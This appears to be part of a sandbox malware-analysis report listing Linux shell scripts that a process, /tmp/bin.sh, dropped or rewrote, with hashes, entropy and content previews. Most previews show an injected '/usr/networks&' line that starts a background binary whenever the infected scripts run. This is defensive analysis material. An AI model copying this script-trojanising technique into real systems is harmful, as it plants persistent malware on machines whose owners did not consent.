                                                                                                    SSDEEP:384:AhYCrncz9NJ20iuYwj9hkinrV8a0cvxo5sLG:Evrncz9NJGrwj9hkinrV8aHgsLG
                                                                                                    MD5:9DEFBAA753E5A9E5620E466E81715A35
                                                                                                    SHA1:751D0F882BE1494064C68A074DA5DC1CE599A349
                                                                                                    SHA-256:A8E3C858BE59F3DC8811EC7979F347FD07D7213089E5E3A1BD5BA7AFBBA1CE9C
                                                                                                    SHA-512:24851711C125FB277844B0AEE501A25EC2ED797417FFFF6F862793E24F07B94DF227DB54938728FBED1A711C74D84A7E86599BE248BC173387406BAC27F4E64F
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ -s "$SHFILE" -a "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been u
                                                                                                    /usr/share/alsa-base/alsa-info.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text, with very long lines
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25464
                                                                                                    Entropy (8bit):5.453877096685684
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:xhDCrnchINJ20QuPxj9DksnrVfp0+KvN5sLF:nernchINJsWxj9DksnrVfp0PsLF
                                                                                                    MD5:D8A586F0E09BD885937F5C46F02D64D0
                                                                                                    SHA1:2B5E662E8047318FB7A69BC3EEC9BB72A6300EDB
                                                                                                    SHA-256:62F4B99FB4C5B55F17E4299589190545998B875C431470D2A87D0E43D7DF990B
                                                                                                    SHA-512:70B65F5F85A5C2C82FCFD58F0A22CA13C7624AA27C8927EE65933D892443B718461BAD7250AC3271C71C0C22850710E503D20E6F2F33C7BE2FE5D5E8C97C0F13
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been updated to v $REM
                                                                                                    /usr/share/alsa/utils.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4725
                                                                                                    Entropy (8bit):5.44928341819888
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:yGC9i91fZ1j73kqM51SvbZGspLpZonAeVceVIP/yKIkC6eZju:yGC90f/4SvbYapZoh/GC64ju
                                                                                                    MD5:B4F115765D68E40BEBB845FA7F437539
                                                                                                    SHA1:4C37804189C7D91916E7050F4E4783A4C7F2F389
                                                                                                    SHA-256:9EAA55914953E4BAE6AF1E28841BD329160A16D17DE8061B04519669B2B2BCF9
                                                                                                    SHA-512:27D938F1CA106CA6431F2B8635D223BAA47D192D983357A649B95B70DB931199E8B084C2EB337321D9D6B4D4F63D6BA64A8CEFA5FE888896BE7FA1C5D2983CC9
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.bugout() { echo "${MYNAME}: Programming error" >&2 ; exit 123 ; }..echo_card_indices().{..if [ -f /proc/asound/cards ] ; then...sed -n -e's/^[[:space:]]*\([0-7]\)[[:space:]].*/\1/p' /proc/asound/cards..fi.}..filter_amixer_output().{..sed \...-e '/Unable to find simple control/d' \...-e '/Unknown playback setup/d' \...-e '/^$/d'.}..# The following functions try to set many controls..# No card has all the controls and so some of the attempts are bound to fail..# Because of this, the functions can't return useful status values...# $1 <control>.# $2 <level>.# $CARDOPT.unmute_and_set_level().{..{ [ "$2" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "$2" unmute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $CARDOPT.mute_and_zero_level().{..{ [ "$1" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "0%" mute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $2 "on" | "off".# $CARDOPT.switch_control().{..{ [ "$2" ] &&
                                                                                                    /usr/share/brltty/initramfs/brltty.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):46
                                                                                                    Entropy (8bit):3.925523369006428
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                    MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                    SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                    SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                    SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                    /usr/share/cups/braille/cups-braille.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:UTF-8 Unicode text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3551
                                                                                                    Entropy (8bit):5.478748088887141
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:OANcIOY/L/1RAnw/UYfot2tAtldWfRzRukEu/YmWhS3mj4VT5V5TNVIt6Wousukz:OANSY/L/1R3/SRWikEu9bVaH/c
                                                                                                    MD5:6025702AFC2865AA8BA8638B3B590284
                                                                                                    SHA1:82A57782652A5D981E9A86E55F0F6D5A276ACEE1
                                                                                                    SHA-256:98D84975905042A77F6E514D7C54478701D6C0CC4BDDFE8B047D2BE3CD475C5C
                                                                                                    SHA-512:0E3A45F3160B3CA7442C4B2D4A9A2AD0A5390AC7091E0F9C870A073C3E6C408C171DE71014005196FF310A67B8ABC08BD0619B81972C118F5CF8281B9234C427
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&. exit 1. ;;. esac. printf "%s" "$VALUE".}..[ -z "$NB" ] && NB=1..#.# Page size.# Units in 100th of mm.#..# TODO: better handle imageable area.PAGESIZE=$(getOption PageSize).case "$PAGESIZE" in. Legal). PAGEWIDTH=21590. PAGEHEIGHT=35560. ;;. Letter). PAGEWIDTH=21590. PAGEHEIGHT=27940. ;;. A3). PAGEWIDTH=29700. PAGEHEIGHT=42000. ;;. A4). PAGEWIDTH=21000. PAGEHEIGHT=29700. ;;. A4TF). PAGEWIDTH=21000. PAGEHEIGHT=30480. ;;. A5). PAGEWIDTH=14850. PAGEHEIGHT=21000. ;;. 110x115). PAGEWIDTH=27940. PAGEHEIGHT=29210. ;;. 110x120). PAGEWIDTH=27940. PAGEHEIGHT=30480. ;;. 110x170). PAGEWIDTH=27940. PAGEHEIGHT=43180. ;;. 115x110). PAGEWIDTH=29210. PAGEHEIGHT=27940. ;;. 120x120). PAGEWIDTH=30480. PAGEHEIGHT=30480. ;;. *). printf "ERROR: Unknown page size '%s'\n" "$PAGESIZE" >&2. exit 1. ;;.esac..#.TODO: hardcoded margin.PRINTABLEWIDTH=$((PAGEWIDTH - 100
                                                                                                    /usr/share/cups/braille/index.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):590
                                                                                                    Entropy (8bit):5.080350031939274
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:aNz9qyz2WNjcIBT/s8lHzSDIyvSs/mFex/UeHz6GJGIyzDFLn:69qA7R/s6TSkc/yex/UeT6GJHa
                                                                                                    MD5:D662E33F24591E0E67D329E55610FA21
                                                                                                    SHA1:C23AA5BAE84C14C8E48023BC330990B4377826C0
                                                                                                    SHA-256:1A9C2355734541A8364E25854C96B0A6C86E524FE55224C9205EF9F0F40B5E55
                                                                                                    SHA-512:5F7DFCBCCABFAF9D56B5166897CDAA66B0146324A2D3F398B99713CFAE58774FE4D678F04EFC19253366E2455246692A4A9572423331A828459192561B66C40B
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&. *) printf "ERROR: unsupported '%s' page folding\n" "$FOLDING" >&2 ; exit 1 ;;. esac.. # Configure dots spacing. case "$TEXTDOTDISTANCE" in. 220) INIT+=,TD1 ;;. 250) INIT+=,TD0 ;;. 320) INIT+=,TD2 ;;. *) printf "ERROR: unsupported '%s' text dot distance\n" "$TEXTDOTDISTANCE" >&2 ; exit 1 ;;. esac. case $GRAPHICDOTDISTANCE in. 160) INIT+=,GD2 ;;. 200) INIT+=,GD0 ;;. 250) INIT+=,GD1 ;;. *) printf "ERROR: unsupported '%s'graphic dot distance\n" "$GRAPHICDOTDISTANCE" >&2 ; exit 1 ;;. esac.. echo "$INIT".}../usr/networks&.exit 1.
                                                                                                    /usr/share/cups/braille/indexv3.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):945
                                                                                                    Entropy (8bit):4.9071581716168575
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:hO+DYLYWYZBBmbq2rywi+bdKz80g/D+6k9JSW9L:DDYLYWYZ3rwi+BKjg/D+RJSW9L
                                                                                                    MD5:F0CACB80F022AB8FC64F04310E59BEC2
                                                                                                    SHA1:059D10F9C33BF8724F38F1E4A444022D9CEDBD82
                                                                                                    SHA-256:62634D82D3013B5004E7220BC0CEBA6AE0C6DAFDC41C5B4D19B49A5154BFCE09
                                                                                                    SHA-512:B94116448FBC22E5E205225FD18B8D3D159BD5BA2E68758BF12EE4EA12860F40C0F5DD8B7F064C8B1994280BDD999779035F80F2D55937C54A649F02A8BC7068
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&..exit 1. fi. if [ $LINESPACING -lt 100 ]. then..echo "ERROR: too small $LINESPACING line spacing" >&2..exit 1. fi. INIT+=,LS$(($LINESPACING / 10)). ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Hoping the user properly configured an 8-dot table. 8) ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                    /usr/share/cups/braille/indexv4.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):818
                                                                                                    Entropy (8bit):4.8178661177968065
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:C9DYLYWYZBBmbq2rywd8P8LVz80g/D+6k9JSW9L:wDYLYWYZ3rwyP8Bjg/D+RJSW9L
                                                                                                    MD5:07C3F2CE31B1380132DE8B1D5B9C4BA8
                                                                                                    SHA1:769D00809D188A7D9F8357152C9B82F634C0514B
                                                                                                    SHA-256:162E03582392361663035FF70A573CB379796CA647404BFFBE1C22D6AE7C25FB
                                                                                                    SHA-512:CB698C8E13D0635643F5F8102FFA961D050649F82FB915155B5D19E4CFC5985C86586BF41082731ACFDCBA5F799FF7F056A4D6AD0337383FABC4731D352D16CD
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&. exit 1. ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Firmware 11.02.1 and above allow to make sure to be using a 8-dot table. 8) INIT+=,BT6 ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                    /usr/share/debconf/confmodule.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/acpid/examples/ac.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/acpid/examples/default.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):309
                                                                                                    Entropy (8bit):4.972882784760757
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:3Z2iGYkj5Ri36+u4DXFI7WBRZrjFI7efgYjFI7e6RTaKtkmTn:J2iB6PiZqWZdqefgQq9tPkmTn
                                                                                                    MD5:8B5CC9506A59F35C919D0CF65E3D75FA
                                                                                                    SHA1:956100F1C2B0A99C8B578DC6CE4854991089289A
                                                                                                    SHA-256:F53B8D26AD4D0CDE785D89C2F85D2132B943D5AB01FC482A8D53D1D6D3A01D5E
                                                                                                    SHA-512:725E036838D708E1BCBA1A5C89470B892BA249305AC5D237B203AB21B0794A1BC64917ACBBD1793F41F530E482C85C9C252D143DACB68E9667088E274139B905
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&..test -e "$DEVNAME" || { echo "$DEVNAME doesn't exist, aborting"; exit 1; }..#echo "$DEVNAME exists"..if blockdev --rereadpt "$DEVNAME"; then...echo "blockdev --rereadpt succeeded"...exit 0..fi..echo "blockdev --rereadpt failed, exit code: $?".done.echo "Timed out".) &../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/cron/examples/cron-tasks-review.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3647
                                                                                                    Entropy (8bit):4.544491450799858
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:TExE7LzpY0V0rmzBpuYlzsSwG7SRpvzTC/8mO:TExgHpYa0ABppdsSyk8mO
                                                                                                    MD5:734F4010B22A9F64DBCCED57155A6396
                                                                                                    SHA1:1A3984285346A3FB8CF1A2666F273A8EFC300495
                                                                                                    SHA-256:5F76E60D53DEB684C98DFE7E2306D0AAC86938ECB6B68AA41283F560CFEBACF8
                                                                                                    SHA-512:8BC6C5176E4742ECBD69498B7CA52955CAF78031A996E0B50DFC23AA490C02B00B71E70DA500D27BEF241025B2FB3D4C50A943D6CB49E4964127E2513E836ADC
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&. -h|--help) usage; exit 0;;. -v|--version) version; exit 0;;. -s|--syslog) syslog="yes";;. -i|--info) send_info="yes";;. *) ;;. esac.done. ..send_message () {.. level=$1. msg=$2. [ "$level" = "info" ] && [ "$send_info" = "no" ] && return.. if [ "$syslog" = "yes" ] ; then. logger -p cron.$level -t CRON $msg. else. case $level in. "warn"). echo "WARN: $msg" >&2. ;;. "info"). echo "INFO: $msg" . ;;. esac. fi.}..warn () {.# Send a warning to the user. file=$1. reason=$2.. name=`basename $file`. # Skip hidden files. echo $name | grep -q -E '^\.' && return. # Skip disabled files. echo $name | grep -q -E '\.disabled' && return.. # TODO: Should we send warnings for '.old' or '.orig'?.. # Do not send a warning if the file is '.dpkg-old' or '.dpkg-dist'. if ! echo $file | grep -q -E '\.dp
                                                                                                    /usr/share/doc/gawk/examples/network/PostAgent.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/gawk/examples/prog/igawk.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:awk or perl script, ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1829
                                                                                                    Entropy (8bit):4.38604786798686
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:yiYuM2UFMx/sIo6ml4wiQDRoLe/HfwoDt8vPP6k30YXU0kKhpjKGg:eBMx/tKiQDWawit8vPP6A0YXjnhpjXg
                                                                                                    MD5:141401CE535E9FFF3A9F3C9D5ECEC093
                                                                                                    SHA1:B0A5FA40FFBDAFF1F415B38513CE2A7921328D05
                                                                                                    SHA-256:68EC7433147E2F312EA47B69A5CEAE1B781AC9C95260A8D95F2A9354E26A0C35
                                                                                                    SHA-512:A3CC9A94FB7D97A1F57AE1D29A3432A56ACCE85C50E0F4073D65AC5CF77C50DE4A74E207203141ABD7297B62068BB937A3C63E5880A79C09950E5E6DD562D1BC
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&. exit 0 ;;.. -[W-]*) opts="$opts '$1'" ;;.. *) break ;;. esac. shift.done..if [ -z "$program" ].then. program=${1?'missing program'}. shift.fi..# At this point, `program' has the program..expand_prog='..function pathto(file, i, t, junk).{. if (index(file, "/") != 0). return file.. if (file == "-"). return file.. for (i = 1; i <= ndirs; i++) {. t = (pathlist[i] "/" file). if ((getline junk < t) > 0) {. # found it. close(t). return t. }. }. return "".}.BEGIN {. path = ENVIRON["AWKPATH"]. ndirs = split(path, pathlist, ":"). for (i = 1; i <= ndirs; i++) {. if (pathlist[i] == ""). pathlist[i] = ".". }. stackptr = 0. input[stackptr] = ARGV[1] # ARGV[1] is first file.. for (; stackptr >= 0; stackptr--) {. while ((getline < input[stackptr]) > 0) {. if (tolower($1) != "@include") {. print
                                                                                                    /usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/gdb/contrib/ari/gdb_find.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/gdb/contrib/expect-read1.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):253
                                                                                                    Entropy (8bit):5.267626424494032
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:aBH51mUeX3+G3Wj3kGjVnAdiIVUe8J24n:aB51je+f3VnBaUe8J24n
                                                                                                    MD5:37C0552689BD7719FFBE66F4C9AB831B
                                                                                                    SHA1:8BA6E9AED3FF50AB5AE1E516E1ADEE1F1464BF79
                                                                                                    SHA-256:6B21FC4B985122F02025F5050FD3C0910228E394DC9E72EBEC9F6354785BDF0B
                                                                                                    SHA-512:EA97773FE3E45B9A392CA74C1D8D527952980474C75846495A796652FAB647128844E9E87529D51CBF7520ACA08F7C1188E676E5E5BAC4F0FAA7B75B66538F31
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&. exit 2.fi.SO=/tmp/expect-read1.$$.so.rm -f $SO.CMD="${CC_FOR_TARGET:-gcc} -o $SO -Wall -fPIC -shared $C".if ! $CMD; then. echo >&2 "$0: Failed: $CMD". exit 2.fi.trap "rm -f $SO" EXIT.LD_PRELOAD=$SO expect "$@"../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/gdb/contrib/gdb-add-index.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1048
                                                                                                    Entropy (8bit):4.806462537404251
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:yJI5VNyJmc20JsvodjbGCHiVwZvFfg0udaATYdITFvVg47VZ0ou:II63pJftBudaqYmTFmJ
                                                                                                    MD5:5864556D6334995F87B9236F2BDDAE2F
                                                                                                    SHA1:65C2E90583C5B2DF8050063559E7FA2885F7427F
                                                                                                    SHA-256:4BBE42BA86B2EBBC463E505A6D3551775BB4E2ED64BDA2C8F1E7B50B9F4C99C3
                                                                                                    SHA-512:0E99B5F846FE6295B4ACFF8030BCBE895D1BCCCDF7B0098E8DABF8ADC50E56CA8A38A549B5A052C86FF9DA9B0A2C7BFBAD7CE939F373AB78F525FEEF2065D615
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&. exit 1.fi..file="$1"..if test ! -r "$file"; then. echo "$myname: unable to access: $file" 1>&2. exit 1.fi..dir="${file%/*}".test "$dir" = "$file" && dir=".".index="${file}.gdb-index"..rm -f $index.# Ensure intermediate index file is removed when we exit..trap "rm -f $index" 0..$GDB --batch -nx -iex 'set auto-load no' \. -ex "file $file" -ex "save gdb-index $dir" || {. # Just in case.. status=$?. echo "$myname: gdb error generating index for $file" 1>&2. exit $status.}..# In some situations gdb can exit without creating an index. This is.# not an error..# E.g., if $file is stripped. This behaviour is akin to stripping an.# already stripped binary, it's a no-op..status=0..if test -f "$index"; then. $OBJCOPY --add-section .gdb_index="$index" \..--set-section-flags .gdb_index=readonly "$file" "$file". status=$?.else. echo "$myname: No index was created for $file" 1>&2. echo "$myname: [Was there no debuginfo? Was there already an index?
                                                                                                    /usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/git/contrib/examples/git-am.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:OS/2 REXX batch file, ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21942
                                                                                                    Entropy (8bit):5.106661772210516
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:6REUag9f8Ydg0VeV9KziwsORFRByXlU1m4csVIw17OqlDfRRdxyZymevMNcPh/Rl:6Rhb9fJd1Vmkziw9RFRByX8D7Vd7Oqlh
                                                                                                    MD5:16E6ACE0E85A54EA4C061BDA1D3BF70D
                                                                                                    SHA1:B2569F727A9B61E0583574CC0793647136F76E32
                                                                                                    SHA-256:B56C64E30B028ACB3523D99266AD8931417240B883EC8961ED24F4004D6EA1C9
                                                                                                    SHA-512:F730D5171A9533A87455BEA4133439096E9A53C4783FAD29DA3DFDB9BBCD2F05DDF9EBBEBB94CF21AC4138833AB83B9AEF94612D5538671F29B726F147749322
                                                                                                    Malicious:false
